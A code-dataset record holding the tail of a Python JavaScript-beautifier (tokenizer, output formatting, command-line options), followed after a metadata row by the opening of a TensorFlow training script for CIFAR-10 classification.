self.allow_wrap_or_preserved_newline(current_token)
space_before = True
space_after = True
if current_token.text in ['--', '++', '!', '~'] \
or (current_token.text in ['+', '-'] \
and (self.last_type in ['TK_START_BLOCK', 'TK_START_EXPR', 'TK_EQUALS', 'TK_OPERATOR'] \
or self.flags.last_text in Tokenizer.line_starters or self.flags.last_text == ',')):
space_before = False
space_after = False
# http://www.ecma-international.org/ecma-262/5.1/#sec-7.9.1
# if there is a newline between -- or ++ and anything else we should preserve it.
if current_token.wanted_newline and (current_token.text == '--' or current_token.text == '++'):
self.print_newline(preserve_statement_flags = True)
if self.flags.last_text == ';' and self.is_expression(self.flags.mode):
# for (;; ++i)
# ^^
space_before = True
if self.last_type == 'TK_RESERVED':
space_before = True
elif self.last_type == 'TK_END_EXPR':
space_before = not (self.flags.last_text == ']' and current_token.text in ['--', '++'])
elif self.last_type == 'TK_OPERATOR':
# a++ + ++b
# a - -b
space_before = current_token.text in ['--', '-','++', '+'] and self.flags.last_text in ['--', '-','++', '+']
# + and - are not unary when preceeded by -- or ++ operator
# a-- + b
# a * +b
# a - -b
if current_token.text in ['-', '+'] and self.flags.last_text in ['--', '++']:
space_after = True
if self.flags.mode == MODE.BlockStatement and self.flags.last_text in ['{', ';']:
# { foo: --i }
# foo(): --bar
self.print_newline()
elif current_token.text == ':':
if self.flags.ternary_depth == 0:
# Colon is invalid javascript outside of ternary and object, but do our best to guess what was meant.
space_before = False
else:
self.flags.ternary_depth -= 1
elif current_token.text == '?':
self.flags.ternary_depth += 1
elif current_token.text == '*' and self.last_type == 'TK_RESERVED' and self.flags.last_text == 'function':
space_before = False
space_after = False
if space_before:
self.output.space_before_token = True
self.print_token(current_token)
if space_after:
self.output.space_before_token = True
def handle_block_comment(self, current_token):
if self.output.raw:
self.output.add_raw_token(current_token)
if current_token.directives and current_token.directives.get('preserve') == 'end':
# If we're testing the raw output behavior, do not allow a directive to turn it off.
if not self.opts.test_output_raw:
self.output.raw = False
return
if current_token.directives:
self.print_newline(preserve_statement_flags = True)
self.print_token(current_token)
if current_token.directives.get('preserve') == 'start':
self.output.raw = True
self.print_newline(preserve_statement_flags = True)
return
# inline block
if not self.acorn.newline.search(current_token.text) and not current_token.wanted_newline:
self.output.space_before_token = True
self.print_token(current_token)
self.output.space_before_token = True
return
lines = self.acorn.lineBreak.split(current_token.text)
javadoc = False
starless = False
last_indent = current_token.whitespace_before
last_indent_length = len(last_indent)
# block comment starts with a new line
self.print_newline(preserve_statement_flags = True)
if len(lines) > 1:
if not any(l for l in lines[1:] if ( l.strip() == '' or (l.lstrip())[0] != '*')):
javadoc = True
elif all(l.startswith(last_indent) or l.strip() == '' for l in lines[1:]):
starless = True
# first line always indented
self.print_token(current_token, lines[0])
for line in lines[1:]:
self.print_newline(preserve_statement_flags = True)
if javadoc:
# javadoc: reformat and re-indent
self.print_token(current_token, ' ' + line.lstrip())
elif starless and len(line) > last_indent_length:
# starless: re-indent non-empty content, avoiding trim
self.print_token(current_token, line[last_indent_length:])
else:
# normal comments output raw
self.output.add_token(line)
self.print_newline(preserve_statement_flags = True)
def handle_comment(self, current_token):
if current_token.wanted_newline:
self.print_newline(preserve_statement_flags = True)
if not current_token.wanted_newline:
self.output.trim(True)
self.output.space_before_token = True
self.print_token(current_token)
self.print_newline(preserve_statement_flags = True)
def handle_dot(self, current_token):
if self.start_of_statement(current_token):
# The conditional starts the statement if appropriate.
pass
if self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text):
self.output.space_before_token = True
else:
# allow preserved newlines before dots in general
# force newlines on dots after close paren when break_chained - for bar().baz()
self.allow_wrap_or_preserved_newline(current_token,
self.flags.last_text == ')' and self.opts.break_chained_methods)
self.print_token(current_token)
def handle_unknown(self, current_token):
self.print_token(current_token)
if current_token.text[-1] == '\n':
self.print_newline()
def handle_eof(self, current_token):
# Unwind any open statements
while self.flags.mode == MODE.Statement:
self.restore_mode()
def mkdir_p(path):
try:
if path:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
# Using object instead of string to allow for later expansion of info about each line
class OutputLine:
def __init__(self, parent):
self.__parent = parent
self.__character_count = 0
self.__indent_count = -1
self.__items = []
self.__empty = True
def get_character_count(self):
return self.__character_count
def is_empty(self):
return self.__empty
def set_indent(self, level):
self.__character_count = self.__parent.baseIndentLength + level * self.__parent.indent_length
self.__indent_count = level;
def last(self):
if not self.is_empty():
return self.__items[-1]
else:
return None
def push(self, input):
self.__items.append(input)
self.__character_count += len(input)
self.__empty = False
def pop(self):
item = None
if not self.is_empty():
item = self.__items.pop()
self.__character_count -= len(item)
self.__empty = len(self.__items) == 0
return item
def remove_indent(self):
if self.__indent_count > 0:
self.__indent_count -= 1
self.__character_count -= self.__parent.indent_length
def trim(self):
while self.last() == ' ':
item = self._items.pop()
self.__character_count -= 1
self.__empty = len(self.__items) == 0
def toString(self):
result = ''
if not self.is_empty():
if self.__indent_count >= 0:
result = self.__parent.indent_cache[self.__indent_count]
result += ''.join(self.__items)
return result
class Output:
def __init__(self, indent_string, baseIndentString = ''):
self.indent_string = indent_string
self.baseIndentString = baseIndentString
self.indent_cache = [ baseIndentString ]
self.baseIndentLength = len(baseIndentString)
self.indent_length = len(indent_string)
self.raw = False
self.lines = []
self.previous_line = None
self.current_line = None
self.space_before_token = False
self.add_outputline()
def add_outputline(self):
self.previous_line = self.current_line
self.current_line = OutputLine(self)
self.lines.append(self.current_line)
def get_line_number(self):
return len(self.lines)
def add_new_line(self, force_newline):
if len(self.lines) == 1 and self.just_added_newline():
# no newline on start of file
return False
if force_newline or not self.just_added_newline():
if not self.raw:
self.add_outputline()
return True
return False
def get_code(self):
sweet_code = "\n".join(line.toString() for line in self.lines)
return re.sub('[\r\n\t ]+$', '', sweet_code)
def set_indent(self, level):
# Never indent your first output indent at the start of the file
if len(self.lines) > 1:
while level >= len(self.indent_cache):
self.indent_cache.append(self.indent_cache[-1] + self.indent_string)
self.current_line.set_indent(level)
return True
self.current_line.set_indent(0)
return False
def add_raw_token(self, token):
for _ in range(token.newlines):
self.add_outputline()
self.current_line.push(token.whitespace_before)
self.current_line.push(token.text)
self.space_before_token = False
def add_token(self, printable_token):
self.add_space_before_token()
self.current_line.push(printable_token)
def add_space_before_token(self):
if self.space_before_token and not self.just_added_newline():
self.current_line.push(' ')
self.space_before_token = False
def remove_redundant_indentation(self, frame):
# This implementation is effective but has some issues:
# - can cause line wrap to happen too soon due to indent removal
# after wrap points are calculated
# These issues are minor compared to ugly indentation.
if frame.multiline_frame or frame.mode == MODE.ForInitializer or frame.mode == MODE.Conditional:
return
# remove one indent from each line inside this section
index = frame.start_line_index
while index < len(self.lines):
self.lines[index].remove_indent()
index += 1
def trim(self, eat_newlines = False):
self.current_line.trim()
while eat_newlines and len(self.lines) > 1 and self.current_line.is_empty():
self.lines.pop()
self.current_line = self.lines[-1]
self.current_line.trim()
if len(self.lines) > 1:
self.previous_line = self.lines[-2]
else:
self.previous_line = None
def just_added_newline(self):
return self.current_line.is_empty()
def just_added_blankline(self):
if self.just_added_newline():
if len(self.lines) == 1:
return True
line = self.lines[-2]
return line.is_empty()
return False
class Tokenizer:
whitespace = ["\n", "\r", "\t", " "]
digit = re.compile('[0-9]')
digit_hex = re.compile('[0123456789abcdefABCDEF]')
punct = ('+ - * / % & ++ -- = += -= *= /= %= == === != !== > < >= <= >> << >>> >>>= >>= <<= && &= | || ! ~ , : ? ^ ^= |= :: =>' \
+ ' <?= <? ?> <%= <% %>').split(' ')
# Words which always should start on a new line
line_starters = 'continue,try,throw,return,var,let,const,if,switch,case,default,for,while,break,function,import,export'.split(',')
reserved_words = line_starters + ['do', 'in', 'else', 'get', 'set', 'new', 'catch', 'finally', 'typeof', 'yield', 'async', 'await']
def __init__ (self, input, opts, indent_string):
self.input = input
self.opts = opts
self.indent_string = indent_string
self.acorn = Acorn()
# /* ... */ comment ends with nearest */ or end of file
self.block_comment_pattern = re.compile('([\s\S]*?)((?:\*\/)|$)')
# comment ends just before nearest linefeed or end of file
self.comment_pattern = re.compile(self.acorn.six.u('([^\n\r\u2028\u2029]*)'))
self.directives_block_pattern = re.compile('\/\* beautify( \w+[:]\w+)+ \*\/')
self.directive_pattern = re.compile(' (\w+)[:](\w+)')
self.directives_end_ignore_pattern = re.compile('([\s\S]*?)((?:\/\*\sbeautify\signore:end\s\*\/)|$)')
self.template_pattern = re.compile('((<\?php|<\?=)[\s\S]*?\?>)|(<%[\s\S]*?%>)')
def tokenize(self):
self.in_html_comment = False
self.parser_pos = 0
self.tokens = []
next = None
last = None
open = None
open_stack = []
comments = []
while not (not last == None and last.type == 'TK_EOF'):
token_values = self.__tokenize_next()
next = Token(token_values[1], token_values[0], self.n_newlines, self.whitespace_before_token)
while next.type == 'TK_COMMENT' or next.type == 'TK_BLOCK_COMMENT' or next.type == 'TK_UNKNOWN':
if next.type == 'TK_BLOCK_COMMENT':
next.directives = token_values[2]
comments.append(next)
token_values = self.__tokenize_next()
next = Token(token_values[1], token_values[0], self.n_newlines, self.whitespace_before_token)
if len(comments) > 0:
next.comments_before = comments
comments = []
if next.type == 'TK_START_BLOCK' or next.type == 'TK_START_EXPR':
next.parent = last
open_stack.append(open)
open = next
elif (next.type == 'TK_END_BLOCK' or next.type == 'TK_END_EXPR') and \
(not open == None and ( \
(next.text == ']' and open.text == '[') or \
(next.text == ')' and open.text == '(') or \
(next.text == '}' and open.text == '{'))):
next.parent = open.parent
open = open_stack.pop()
self.tokens.append(next)
last = next
return self.tokens
def get_directives (self, text):
if not self.directives_block_pattern.match(text):
return None
directives = {}
directive_match = self.directive_pattern.search(text)
while directive_match:
directives[directive_match.group(1)] = directive_match.group(2)
directive_match = self.directive_pattern.search(text, directive_match.end())
return directives
def __tokenize_next(self):
whitespace_on_this_line = []
self.n_newlines = 0
self.whitespace_before_token = ''
if self.parser_pos >= len(self.input):
return '', 'TK_EOF'
if len(self.tokens) > 0:
last_token = self.tokens[-1]
else:
# For the sake of tokenizing we can pretend that there was on open brace to start
last_token = Token('TK_START_BLOCK', '{')
c = self.input[self.parser_pos]
self.parser_pos += 1
while c in self.whitespace:
if self.acorn.newline.match(c):
# treat \r\n as one newline
if not (c == '\n' and self.input[self.parser_pos-2] == '\r'):
self.n_newlines += 1
whitespace_on_this_line = []
else:
whitespace_on_this_line.append(c)
if self.parser_pos >= len(self.input):
return '', 'TK_EOF'
c = self.input[self.parser_pos]
self.parser_pos += 1
if len(whitespace_on_this_line) != 0:
self.whitespace_before_token = ''.join(whitespace_on_this_line)
if self.digit.match(c):
allow_decimal = True
allow_e = True
local_digit = self.digit
if c == '0' and self.parser_pos < len(self.input) and re.match('[Xx]', self.input[self.parser_pos]):
# switch to hex number, no decimal or e, just hex digits
allow_decimal = False
allow_e = False
c += self.input[self.parser_pos]
self.parser_pos += 1
local_digit = self.digit_hex
else:
# we know this first loop will run. It keeps the logic simpler.
c = ''
self.parser_pos -= 1
# Add the digits
while self.parser_pos < len(self.input) and local_digit.match(self.input[self.parser_pos]):
c += self.input[self.parser_pos]
self.parser_pos += 1
if allow_decimal and self.parser_pos < len(self.input) and self.input[self.parser_pos] == '.':
c += self.input[self.parser_pos]
self.parser_pos += 1
allow_decimal = False
if allow_e and self.parser_pos < len(self.input) and re.match('[Ee]', self.input[self.parser_pos]):
c += self.input[self.parser_pos]
self.parser_pos += 1
if self.parser_pos < len(self.input) and re.match('[+-]', self.input[self.parser_pos]):
c += self.input[self.parser_pos]
self.parser_pos += 1
allow_e = False
allow_decimal = False
return c, 'TK_WORD'
if self.acorn.isIdentifierStart(ord(self.input[self.parser_pos-1])):
if self.parser_pos < len(self.input):
while self.acorn.isIdentifierChar(ord(self.input[self.parser_pos])):
c = c + self.input[self.parser_pos]
self.parser_pos += 1
if self.parser_pos == len(self.input):
break
if not (last_token.type == 'TK_DOT' \
or (last_token.type == 'TK_RESERVED' and last_token.text in ['set', 'get'])) \
and c in self.reserved_words:
if c == 'in': # in is an operator, need to hack
return c, 'TK_OPERATOR'
return c, 'TK_RESERVED'
return c, 'TK_WORD'
if c in '([':
return c, 'TK_START_EXPR'
if c in ')]':
return c, 'TK_END_EXPR'
if c == '{':
return c, 'TK_START_BLOCK'
if c == '}':
return c, 'TK_END_BLOCK'
if c == ';':
return c, 'TK_SEMICOLON'
if c == '/':
comment = ''
inline_comment = True
if self.input[self.parser_pos] == '*': # peek /* .. */ comment
self.parser_pos += 1
comment_match = self.block_comment_pattern.match(self.input, self.parser_pos)
comment = '/*' + comment_match.group(0)
self.parser_pos += len(comment_match.group(0))
directives = self.get_directives(comment)
if directives and directives.get('ignore') == 'start':
comment_match = self.directives_end_ignore_pattern.match(self.input, self.parser_pos)
comment += comment_match.group(0)
self.parser_pos += len(comment_match.group(0))
comment = re.sub(self.acorn.lineBreak, '\n', comment)
return comment, 'TK_BLOCK_COMMENT', directives
if self.input[self.parser_pos] == '/': # peek // comment
self.parser_pos += 1
comment_match = self.comment_pattern.match(self.input, self.parser_pos)
comment = '//' + comment_match.group(0)
self.parser_pos += len(comment_match.group(0));
return comment, 'TK_COMMENT'
if c == '`' or c == "'" or c == '"' or \
( \
(c == '/') or \
(self.opts.e4x and c == "<" and re.match('^<([-a-zA-Z:0-9_.]+|{[^{}]*}|!\[CDATA\[[\s\S]*?\]\])(\s+[-a-zA-Z:0-9_.]+\s*=\s*(\'[^\']*\'|"[^"]*"|{.*?}))*\s*(/?)\s*>', self.input[self.parser_pos - 1:])) \
) and ( \
(last_token.type == 'TK_RESERVED' and last_token.text in ['return', 'case', 'throw', 'else', 'do', 'typeof', 'yield']) or \
(last_token.type == 'TK_END_EXPR' and last_token.text == ')' and \
last_token.parent and last_token.parent.type == 'TK_RESERVED' and last_token.parent.text in ['if', 'while', 'for']) or \
(last_token.type in ['TK_COMMENT', 'TK_START_EXPR', 'TK_START_BLOCK', 'TK_END_BLOCK', 'TK_OPERATOR', \
'TK_EQUALS', 'TK_EOF', 'TK_SEMICOLON', 'TK_COMMA'])):
sep = c
esc = False
esc1 = 0
esc2 = 0
resulting_string = c
in_char_class = False
if sep == '/':
# handle regexp
in_char_class = False
while self.parser_pos < len(self.input) and \
(esc or in_char_class or self.input[self.parser_pos] != sep) and \
not self.acorn.newline.match(self.input[self.parser_pos]):
resulting_string += self.input[self.parser_pos]
if not esc:
esc = self.input[self.parser_pos] == '\\'
if self.input[self.parser_pos] == '[':
in_char_class = True
elif self.input[self.parser_pos] == ']':
in_char_class = False
else:
esc = False
self.parser_pos += 1
elif self.opts.e4x and sep == '<':
# handle e4x xml literals
xmlRegExp = re.compile('<(\/?)([-a-zA-Z:0-9_.]+|{[^{}]*}|!\[CDATA\[[\s\S]*?\]\])(\s+[-a-zA-Z:0-9_.]+\s*=\s*(\'[^\']*\'|"[^"]*"|{.*?}))*\s*(/?)\s*>')
xmlStr = self.input[self.parser_pos - 1:]
match = xmlRegExp.match(xmlStr)
if match:
rootTag = match.group(2)
depth = 0
while (match):
isEndTag = match.group(1)
tagName = match.group(2)
isSingletonTag = (match.groups()[-1] != "") or (match.group(2)[0:8] == "![CDATA[")
if tagName == rootTag and not isSingletonTag:
if isEndTag:
depth -= 1
else:
depth += 1
if depth <= 0:
break
match = xmlRegExp.search(xmlStr, match.end())
if match:
xmlLength = match.end() # + len(match.group())
else:
xmlLength = len(xmlStr)
self.parser_pos += xmlLength - 1
xmlStr = re.sub(self.acorn.lineBreak, '\n', xmlStr[:xmlLength])
return xmlStr, 'TK_STRING'
else:
# handle string
while self.parser_pos < len(self.input) and \
(esc or (self.input[self.parser_pos] != sep and
(sep == '`' or not self.acorn.newline.match(self.input[self.parser_pos])))):
resulting_string += self.input[self.parser_pos]
# Handle \r\n linebreaks after escapes or in template strings
if self.input[self.parser_pos] == '\r' and self.parser_pos + 1 < len(self.input) and self.input[self.parser_pos + 1] == '\n':
self.parser_pos += 1
resulting_string += '\n'
if esc1 and esc1 >= esc2:
try:
esc1 = int(resulting_string[-esc2:], 16)
except Exception:
esc1 = False
if esc1 and esc1 >= 0x20 and esc1 <= 0x7e:
esc1 = chr(esc1)
resulting_string = resulting_string[:-2 - esc2]
if esc1 == sep or esc1 == '\\':
resulting_string += '\\'
resulting_string += esc1
esc1 = 0
if esc1:
esc1 += 1
elif not esc:
esc = self.input[self.parser_pos] == '\\'
else:
esc = False
if self.opts.unescape_strings:
if self.input[self.parser_pos] == 'x':
esc1 += 1
esc2 = 2
elif self.input[self.parser_pos] == 'u':
esc1 += 1
esc2 = 4
self.parser_pos += 1
if self.parser_pos < len(self.input) and self.input[self.parser_pos] == sep:
resulting_string += sep
self.parser_pos += 1
if sep == '/':
# regexps may have modifiers /regexp/MOD, so fetch those too
# Only [gim] are valid, but if the user puts in garbage, do what we can to take it.
while self.parser_pos < len(self.input) and self.acorn.isIdentifierStart(ord(self.input[self.parser_pos])):
resulting_string += self.input[self.parser_pos]
self.parser_pos += 1
resulting_string = re.sub(self.acorn.lineBreak, '\n', resulting_string)
return resulting_string, 'TK_STRING'
if c == '#':
# she-bang
if len(self.tokens) == 0 and len(self.input) > self.parser_pos and self.input[self.parser_pos] == '!':
resulting_string = c
while self.parser_pos < len(self.input) and c != '\n':
c = self.input[self.parser_pos]
resulting_string += c
self.parser_pos += 1
return resulting_string.strip() + '\n', 'TK_UNKNOWN'
# Spidermonkey-specific sharp variables for circular references
# https://developer.mozilla.org/En/Sharp_variables_in_JavaScript
# http://mxr.mozilla.org/mozilla-central/source/js/src/jsscan.cpp around line 1935
sharp = '#'
if self.parser_pos < len(self.input) and self.digit.match(self.input[self.parser_pos]):
while True:
c = self.input[self.parser_pos]
sharp += c
self.parser_pos += 1
if self.parser_pos >= len(self.input) or c == '#' or c == '=':
break
if c == '#' or self.parser_pos >= len(self.input):
pass
elif self.input[self.parser_pos] == '[' and self.input[self.parser_pos + 1] == ']':
sharp += '[]'
self.parser_pos += 2
elif self.input[self.parser_pos] == '{' and self.input[self.parser_pos + 1] == '}':
sharp += '{}'
self.parser_pos += 2
return sharp, 'TK_WORD'
if c == '<' and self.input[self.parser_pos] in ['?', '%']:
template_match = self.template_pattern.match(self.input, self.parser_pos - 1);
if template_match:
c = template_match.group(0)
self.parser_pos += len(c) - 1
c = re.sub(self.acorn.lineBreak, '\n', c)
return c, 'TK_STRING'
if c == '<' and self.input[self.parser_pos - 1 : self.parser_pos + 3] == '<!--':
self.parser_pos += 3
c = '<!--'
while self.parser_pos < len(self.input) and not self.acorn.newline.match(self.input[self.parser_pos]):
c += self.input[self.parser_pos]
self.parser_pos += 1
self.in_html_comment = True
return c, 'TK_COMMENT'
if c == '-' and self.in_html_comment and self.input[self.parser_pos - 1 : self.parser_pos + 2] == '-->':
self.in_html_comment = False
self.parser_pos += 2
return '-->', 'TK_COMMENT'
if c == '.':
return c, 'TK_DOT'
if c in self.punct:
while self.parser_pos < len(self.input) and c + self.input[self.parser_pos] in self.punct:
c += self.input[self.parser_pos]
self.parser_pos += 1
if self.parser_pos >= len(self.input):
break
if c == ',':
return c, 'TK_COMMA'
if c == '=':
return c, 'TK_EQUALS'
return c, 'TK_OPERATOR'
return c, 'TK_UNKNOWN'
def isFileDifferent(filepath, expected):
try:
return (''.join(open(filepath).readlines()) != expected)
except:
return True
def main():
argv = sys.argv[1:]
try:
opts, args = getopt.getopt(argv, "s:c:e:o:rdEPjabkil:xhtfvXnCw:",
['indent-size=','indent-char=','eol=''outfile=', 'replace', 'disable-preserve-newlines',
'space-in-paren', 'space-in-empty-paren', 'jslint-happy', 'space-after-anon-function',
'brace-style=', 'keep-array-indentation', 'indent-level=', 'unescape-strings', 'help',
'usage', 'stdin', 'eval-code', 'indent-with-tabs', 'keep-function-indentation', 'version',
'e4x', 'end-with-newline','comma-first','wrap-line-length'])
except getopt.GetoptError as ex:
print(ex, file=sys.stderr)
return usage(sys.stderr)
js_options = default_options()
file = None
outfile = 'stdout'
replace = False
if len(args) == 1:
file = args[0]
for opt, arg in opts:
if opt in ('--keep-array-indentation', '-k'):
js_options.keep_array_indentation = True
if opt in ('--keep-function-indentation','-f'):
js_options.keep_function_indentation = True
elif opt in ('--outfile', '-o'):
outfile = arg
elif opt in ('--replace', '-r'):
replace = True
elif opt in ('--indent-size', '-s'):
js_options.indent_size = int(arg)
elif opt in ('--indent-char', '-c'):
js_options.indent_char = arg
elif opt in ('--eol', '-e'):
js_options.eol = arg
elif opt in ('--indent-with-tabs', '-t'):
js_options.indent_with_tabs = True
elif opt in ('--disable-preserve-newlines', '-d'):
js_options.preserve_newlines = False
elif opt in ('--space-in-paren', '-P'):
js_options.space_in_paren = True
elif opt in ('--space-in-empty-paren', '-E'):
js_options.space_in_empty_paren = True
elif opt in ('--jslint-happy', '-j'):
js_options.jslint_happy = True
elif opt in ('--space_after_anon_function', '-a'):
js_options.space_after_anon_function = True
elif opt in ('--eval-code'):
js_options.eval_code = True
elif opt in ('--brace-style', '-b'):
js_options.brace_style = arg
elif opt in ('--unescape-strings', '-x'):
js_options.unescape_strings = True
elif opt in ('--e4x', '-X'):
js_options.e4x = True
elif opt in ('--end-with-newline', '-n'):
js_options.end_with_newline = True
elif opt in ('--comma-first', '-C'):
js_options.comma_first = True
elif opt in ('--wrap-line-length ', '-w'):
js_options.wrap_line_length = int(arg)
elif opt in ('--stdin', '-i'):
file = '-'
elif opt in ('--version', '-v'):
return print(__version__)
elif opt in ('--help', '--usage', '-h'):
return usage()
if not file:
print("Must define at least one file.", file=sys.stderr)
return usage(sys.stderr)
else:
try:
if outfile == 'stdout' and replace and not file == '-':
outfile = file
pretty = beautify_file(file, js_options)
if outfile == 'stdout':
sys.stdout.write(pretty)
else:
if isFileDifferent(outfile, pretty):
mkdir_p(os.path.dirname(outfile))
with open(outfile, 'w') as f:
f.write(pretty)
except Exception as ex:
print(ex, file=sys.stderr)
return 1
# Success
return 0
| [
"morosainos@163.com"
] | morosainos@163.com |
78680cec484ff812e360cf2ec9f892a5a9b4884a | dd0a15517807ba4e0f965606071a874e68c88015 | /classification_for_cifar10/train.py | 38e456d95416b42549c2445a837ba25905fc33f1 | [] | no_license | lyxzzz/PWSConv_backup | ad062277d10a50ade35c92dd66c70f118eff85d9 | 5a0ae0d7ca414828c5def0b4ed3a280cbeafef1c | refs/heads/main | 2023-01-28T21:05:07.906071 | 2020-12-11T16:34:42 | 2020-12-11T16:34:42 | 320,268,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,510 | py | import datetime
import os
import sys
import time
import tensorflow as tf
from tensorflow.contrib import slim
import numpy as np
import json
import math
import random
sys.path.append('python')
import cfg_loader
import preprocessing_loader
import data_loader
import model_loader
import eval_func
import optimizer_config
from utils import eval_tools
from utils import tf_utils
from utils.epoch_info_record import EpochRecorder
from utils import file_tools
from utils import progress_bar
tf.app.flags.DEFINE_integer('seed', None, '')
tf.app.flags.DEFINE_float('moving_average_decay', 0.997, '')
tf.app.flags.DEFINE_string('ckpt_name', None, '')
tf.app.flags.DEFINE_string('conv_type', None, '')
tf.app.flags.DEFINE_string('norm_type', None, '')
tf.app.flags.DEFINE_float('pwsepsilon', None, '')
tf.app.flags.DEFINE_integer('batch_size', None, '')
tf.app.flags.DEFINE_float('memory_fraction', 0.5, '')
tf.app.flags.DEFINE_string('model', 'vgg', '')
tf.app.flags.DEFINE_string('model_abstract', None, '')
tf.app.flags.DEFINE_float('learning_rate', None, '')
tf.app.flags.DEFINE_integer('gpuid', 1, '')
FLAGS = tf.app.flags.FLAGS
class Fetch():
def __init__(self):
self.fetchlist = []
self.index = {}
def add(self, val, name):
self.index[name] = [len(self.fetchlist), len(val)]
self.fetchlist += val
def get(self, real_val, name):
return real_val[self.index[name][0]:self.index[name][0]+self.index[name][1]]
def _summary_mean_var(input, axes, name):
# print(input)
mean, var = tf.nn.moments(input, axes=axes)
mean = tf.reduce_mean(mean)
var = tf.reduce_mean(var)
mean_name = name + '_mean'
var_name = name + '_var'
tf.summary.scalar(mean_name, mean)
tf.summary.scalar(var_name, var)
def info(var, mul=1.0):
if len(var.shape) > 1:
mul = 1.0
for v in var.shape[:-1]:
mul *= v
print("shape:{}, var:{}, mean:{}, mul:{}, after mul:{}".format(var.shape, np.var(var), np.mean(var), mul, np.var(var) * mul))
def make_var_mean_summary(para_list):
raw_pred, raw_loc = para_list
layer_len = len(raw_pred)
raw_pred = tf.concat(raw_pred, axis=1)
raw_loc = tf.concat(raw_loc, axis=1)
neg_pred = tf.reshape(raw_pred[:,:,0], [-1])
pos_pred = tf.reshape(raw_pred[:,:,1:], [-1, 20])
loc_pred = tf.reshape(raw_loc, [-1, 4])
_summary_mean_var(neg_pred, 0, 'batch/neg')
_summary_mean_var(pos_pred, 0, 'batch/pos')
_summary_mean_var(loc_pred, 0, 'batch/loc')
_summary_mean_var(raw_pred, [1,2], 'batch/total')
def __parser_cmd_to_json(var, json_dict, name):
if var is not None:
json_dict[name] = var
def main(argv=None):
if FLAGS.seed is not None:
random.seed(FLAGS.seed)
config_path = os.path.join('train_cfgs', FLAGS.model+'.json')
with open(config_path, 'r') as json_file:
start_cfg_dict = json.load(json_file)
TRAIN_PARAMETERS = start_cfg_dict['train_parameters']
RESTORE_PARAMETERS = start_cfg_dict['restore_parameters']
DATASET_PARAMETERS = start_cfg_dict['dataset']
BACKBONE_PARAMETERS = start_cfg_dict['backbone']
NETWORK_PARAMETERS = start_cfg_dict['network']
LOSSES_PARAMETERS = start_cfg_dict['losses']
AUGMENT_PARAMETERS = start_cfg_dict['augmentation']
__parser_cmd_to_json(FLAGS.ckpt_name, TRAIN_PARAMETERS, 'ckpt_name')
__parser_cmd_to_json(FLAGS.conv_type, NETWORK_PARAMETERS, 'conv_type')
__parser_cmd_to_json(FLAGS.norm_type, NETWORK_PARAMETERS, 'norm_func')
__parser_cmd_to_json(FLAGS.batch_size, TRAIN_PARAMETERS, 'train_batch_nums')
__parser_cmd_to_json(FLAGS.pwsepsilon, NETWORK_PARAMETERS, 'pwsepsilon')
if FLAGS.learning_rate is not None:
for i in range(len(TRAIN_PARAMETERS['learning_rate'])):
TRAIN_PARAMETERS['learning_rate'][i] = TRAIN_PARAMETERS['learning_rate'][i] * FLAGS.learning_rate
ROOT_CFG = cfg_loader.get_cfgs(start_cfg_dict.get('default_network_cfgs','emptyCFG'), start_cfg_dict)
gpu_id = FLAGS.gpuid
os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu_id)
now = datetime.datetime.now()
StyleTime = now.strftime("%Y-%m-%d")
file_tools.touch_dir(TRAIN_PARAMETERS['logs_path'] + FLAGS.model_abstract)
file_tools.touch_dir(TRAIN_PARAMETERS['ckpt_path'])
preload_train_dataset, obj_type_nums = data_loader.get_train_dataset(DATASET_PARAMETERS['train'])
train_data_size = len(preload_train_dataset)
prepare_data = preprocessing_loader.prepare_before_model_construct('train', ROOT_CFG)
global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False)
if RESTORE_PARAMETERS['restore']:
lr_init = RESTORE_PARAMETERS['learning_rate']
else:
lr_init = TRAIN_PARAMETERS['learning_rate'][0]
if 'warmup_epoch' in TRAIN_PARAMETERS and TRAIN_PARAMETERS['warmup_epoch'] != 0:
warmup_epoch = TRAIN_PARAMETERS['warmup_epoch']
warmup_init = TRAIN_PARAMETERS['warmup_init']
learning_rate = tf.Variable(warmup_init, trainable=False)
warmup_ratios = (lr_init - warmup_init) / warmup_epoch
else:
warmup_epoch = 0
warmup_ratios = 0.0
learning_rate = tf.Variable(lr_init, trainable=False)
tf.summary.scalar('learning_rate', learning_rate)
opt = optimizer_config.get_optimizer_from_cfg(learning_rate, TRAIN_PARAMETERS.get('optimizer', None))
with tf.device('/gpu:%d' % gpu_id):
with tf.name_scope('model') as scope:
model_outputs = model_loader.forward(ROOT_CFG,
obj_type_nums,
prepare_data[0],
prepare_data[1],
backbone_name=BACKBONE_PARAMETERS['type'])
loss_list = model_loader.losses(ROOT_CFG,
model_outputs,
prepare_data,
loss_name=LOSSES_PARAMETERS['type'])
conv_output = tf.get_collection('conv_output')
conv_input = tf.get_collection('conv_input')
kernel_real_var_list = tf.get_collection('kernel_real_var')
for i, c in enumerate(conv_output):
if "header" not in c.name:
logname = c.name[len("model/tpn_backbone/"):-len("/Conv2D:0")]
m, v = tf.nn.moments(c, [0, 1, 2], name='moments')
tf.summary.scalar("{}/output".format(logname), tf.reduce_min(v))
m, v = tf.nn.moments(conv_input[i], [0, 1, 2], name='moments')
tf.summary.scalar("{}/input".format(logname), tf.reduce_min(v))
tf.summary.scalar("{}/realvar".format(logname), kernel_real_var_list[i])
ema_var_list = None
losses_description = model_loader.losses_description(loss_name=LOSSES_PARAMETERS['type'])
total_loss_index = losses_description[0]
print_loss_dict = losses_description[1]
print_loss_index = losses_description[2]
freezen_list = TRAIN_PARAMETERS.get('freezen_list', None)
train_op, summary_op, grads = tf_utils.create_train_op(loss_list[total_loss_index], opt, FLAGS.moving_average_decay, global_step, ema_var_list, freezen_list)
summary_writer = tf.summary.FileWriter(TRAIN_PARAMETERS['logs_path'] + FLAGS.model_abstract, tf.get_default_graph())
init_op = tf.global_variables_initializer()
saver, variable_restore_op = tf_utils.create_save_op(RESTORE_PARAMETERS['restore'], TRAIN_PARAMETERS['pretrained_model_path'], TRAIN_PARAMETERS.get('pretrained_model_scope',"None")
, TRAIN_PARAMETERS['max_to_keep'], ema_var_list, TRAIN_PARAMETERS.get('checkpoint_exclude_scopes', None))
sess, restore_step = tf_utils.create_session(TRAIN_PARAMETERS['ckpt_path'], init_op, learning_rate, RESTORE_PARAMETERS['learning_rate']
, saver, RESTORE_PARAMETERS['restore'], RESTORE_PARAMETERS['reset_learning_rate']
